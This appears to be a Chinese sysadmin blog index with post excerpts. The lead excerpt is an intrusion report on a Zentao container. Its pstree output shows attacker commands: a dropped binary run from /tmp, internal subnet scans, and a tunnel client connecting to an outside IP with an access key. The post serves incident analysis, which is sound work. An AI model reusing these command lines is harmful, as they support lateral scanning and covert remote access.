运维烂笔头

一个 SA 老兵的工作日志

发表于 更新于

发现时间

最早发现是 2025-05-06 下午,发现 PVE 的香港出口带宽异常,接着发现跟 176.32.35.190 的 tcp 端口 8024 有大量的数据交互

然后在 2025-05-07 上午,用 docker exec -it zentao /bin/bash 进入容器,apt install psmisc,然后 pstree -a 才确认被入侵的。

zentao 容器内执行 pstree -a 输出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
s6-svscan /etc/s6/s6-enable
  |-s6-supervise 00-mysql
  |   `-mysqld_safe /opt/zbox/run/mysql/mysqld_safe ...
  |       `-mariadbd --defaults-file=/data/mysql/etc/my.cnf--basedir=/opt/zbox/run
  |           `-13*[{mariadbd}]
  |-s6-supervise 02-sentry
  |   `-tail -f /tmp/sentry.log
  |-s6-supervise 03-roadrunner
  |   `-rr serve -c /apps/zentao/roadrunner/.rr.yaml
  |       `-5*[{rr}]
  |-s6-supervise 01-apache
  |   `-apachectl /opt/zbox/bin/apachectl -D FOREGROUND
  |       `-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |   `-sh -c ...
  |           |       `-sh -c cd /tmp;./slix;echo 60b45fc9adc5;pwd;echo b0c6bc8c2
  |           |           `-slix
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |-sh
  |           |               |   `-scanb.sh ./scanb.sh
  |           |               |       `-fs -h 192.168.38.0/24 -o 192b.txt -t 5 -np ...
  |           |               |           `-8*[{fs}]
  |           |               `-4*[{slix}]
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |   `-sh -c...
  |           |       `-sh -c...
  |           |           `-ns -server=176.32.35.190:8024 -vkey=82yukro912ktndfc ...
  |           |               `-11*[{ns}]
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           |-httpd -D FOREGROUND
  |           `-httpd -D FOREGROUND
  `-scanb.sh ./scanb.sh
      `-fs -h 192.168.39.0/24 -o 192b.txt -t 5 -np
          `-8*[{fs}]
阅读全文 »

发表于 更新于

在 Docker compose 文件里使用健康检查的方案变迁。
背景:小厂,用不起 kubernetes,只能自己生写 docker compose 来部署 Docker 容器。以下以一个在容器里监听 tcp 端口 8090 的服务为例来描述一下我用到过的健康检查的方案的变迁。

阅读全文 »

发表于 更新于

缘起

我厂有一个网站(域名 a.b.coma1.b.com),原来是跑在自己 IDC 里的机器上的,用 Docker 容器跑的,容器里就一个 nginx,放了一堆的静态资源。

为了“用户体验”,这两个域名都上了 CDN(AWS 的 cloudfront),源站分别是:

  1. a.ori.b.com
  2. a1.ori.b.com

最近做了一次架构调整,把这个服务迁移到了 AWS 的 EC2 上,而且将这个服务放在了一个 ALB 的后面,这个 ALB 是启用了 cloudfront 集成的,所以,我在 route 53 上就把这两个域名都解析到了 ALB 集成的这个 cloudfront distribution 的域名上了。

阅读全文 »

发表于 更新于

我用 800 块钱买了台办公用的 Mini PC

最近,我花了 800 块钱买了一台 Mini PC,用来办公。刚好这四个月在公司领到的每月 200 块钱电脑补贴,全都花光了。算是“取之于公司,用之于公司”吧,哈哈。

这次的购买经历不仅让我更深刻地体会到“消费降级”的现实,还让我感受到了科技进步所带来的性价比红利。在预算有限的情况下,这台 Mini PC 不仅完美满足了我的日常需求,还让我对它的未来用途充满期待。接下来,我详细聊聊这次购买的选择过程、使用体验以及相关感悟。

阅读全文 »

发表于 更新于

背景介绍

最近要做个 log server,把所有服务器的系统日志都收上来。我现在的服务器,操作系统有两种:Amazon Linux 2023 和 Ubuntu,但其实 Ubuntu 又有 22.04 和 24.04 两种,所以,其实是一共有三种操作系统。

好在这三种系统,其缺省跑的日志应用,Amazon Linux 2023 是 systemd-journald,而 Ubuntu(22.04 和 24.04) 都是既跑有 systemd-journald,又跑的有 rsyslogd。这两种日志应用,都是支持集中的日志服务器的,或者很容易支持。但是为什么不就用一套 rsyslogd 的日志服务器呢?毕竟大家都支持 rsyslogd 的。主要是因为 systemd-journald 相对于 rsyslogd 是很新的东西,所以这里也拿出来练练手。

阅读全文 »

发表于 更新于

简介

这是之前有一家公司招 SRE,我投了简历,然后被给了份题让先做一下,于是便有了这篇“水”文。

当然,最终我并没有拿到这个 offer,最早是说一周内安排面试的,后来又说是这个岗位暂停了。

阅读全文 »

发表于 更新于

简介

这是之前有一家海外公司招 DevOps 工程师,我投了简历,期望薪资写了薪资范围的最下限,然后被给了份题让先做一下,于是便有了这篇“水”文。

当然,最终我并没有拿到这个 offer,甚至连下一轮见 CTO 的机会都没有。(关于这个,我其实心里还是有一点小小的不服气的。)

阅读全文 »
0%